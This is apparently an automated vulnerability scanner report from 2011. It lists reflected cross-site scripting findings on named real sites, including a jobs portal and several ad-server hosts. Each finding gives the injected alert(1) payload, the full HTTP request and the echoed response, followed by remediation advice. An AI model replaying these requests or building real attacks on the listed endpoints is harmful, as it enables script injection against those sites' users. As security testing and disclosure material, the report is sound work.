This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/12541544b8b'%3b0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8c'%3be375a52b194 was submitted in the REST URL parameter 3. This input was echoed as 34c8c';e375a52b194 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist34c8c'%3be375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist34c8c';e375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist34c8c';e375a52b194';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='ht
...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26505'-alert(1)-'116ee732501 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined'
...[SNIP]...
1.57. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://europe-jobs.fins.com
Path: /Jobs/125415/FX-Sales-Specialist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a35'-alert(1)-'86ecb919995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined
...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6051f'-alert(1)-'9f8af293c8d was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!=
...[SNIP]...
The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 321b0'><script>alert(1)</script>4de901e5125 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4b4c4<script>alert(1)</script>bf4a4e65793 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload 53eea<script>alert(1)</script>db1fb3cd0c6 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 35a89<script>alert(1)</script>d16cd2cfc2d was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 567c0<script>alert(1)</script>9c40e50b23f was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6dc9'%3balert(1)//25f736e5d37 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as f6dc9';alert(1)//25f736e5d37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 8aede<script>alert(1)</script>3fd943d3e7b was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 82f71<script>alert(1)</script>911cbac5acb was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cdc5'%3balert(1)//de6c201b5f2 was submitted in the rssmikle_item_podcast parameter. This input was echoed as 5cdc5';alert(1)//de6c201b5f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 66512<script>alert(1)</script>2af99c2604f was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e227'%3balert(1)//699ffd7f0a5 was submitted in the rssmikle_target parameter. This input was echoed as 3e227';alert(1)//699ffd7f0a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
n strToInt(str) {
num = parseInt(str);
if(isNaN(num)){ return 0; }
else if(!num) { return 0; }
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank3e227';alert(1)//699ffd7f0a5';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj
...[SNIP]...
The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fec0"><script>alert(1)</script>00a39daf45e was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload e21c2<script>alert(1)</script>91be55c18e9 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 52655<script>alert(1)</script>74461a05d22 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload f76d5<script>alert(1)</script>a4e3224bec was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8347c'%3balert(1)//a640d3a46b8 was submitted in the rssmikle_type parameter. This input was echoed as 8347c';alert(1)//a640d3a46b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90094<script>alert(1)</script>f3f7caa5adf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000848
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39455<script>alert(1)</script>00a2511bc5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000818
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f389<script>alert(1)</script>225d205b362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000783
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 305f9<script>alert(1)</script>8e97949099a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000944
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e3385<script>alert(1)</script>282fccfaf51 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload a831d<a>d56f8d9a874 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653bf"-alert(1)-"673a59be96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f57"-alert(1)-"2fd9033c9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdcb"-alert(1)-"56df82312b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9a5"-alert(1)-"bddaee1fcc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f75b"-alert(1)-"2a1250a692f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7286"-alert(1)-"dc5589e669e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b887"-alert(1)-"3354bebcba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc109"-alert(1)-"1c14d276541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eee26"-alert(1)-"5f399683112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c4d"-alert(1)-"4b274db9fdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21e7f"-alert(1)-"ff89196e097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46a2"-alert(1)-"70ee2108da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
